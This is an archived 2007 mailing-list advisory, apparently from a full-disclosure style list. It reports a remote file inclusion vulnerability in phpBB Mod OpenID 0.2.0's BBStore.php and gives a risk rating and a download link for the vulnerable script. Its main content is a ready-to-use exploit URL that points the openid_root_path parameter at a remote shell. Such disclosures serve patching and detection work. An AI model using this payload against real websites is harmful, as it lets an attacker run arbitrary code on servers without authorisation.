OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion

h3llcodehotmail.it
Date: Sun Sep 30 2007 - 17:50:47 CDT


+++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ phpBB Mod OpenID 0.2.0 BBStore.php RFI
+ Risk: High
+ Found by Seph1roth
+ Site: http://blackroots.it
+
+++++++++++++++++++++++++++++++++++++++++++++++++++

+ Vulnerable Script Download: http://sourceforge.net/project/showfiles.php?group_id=178846

+ Exploit:
http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]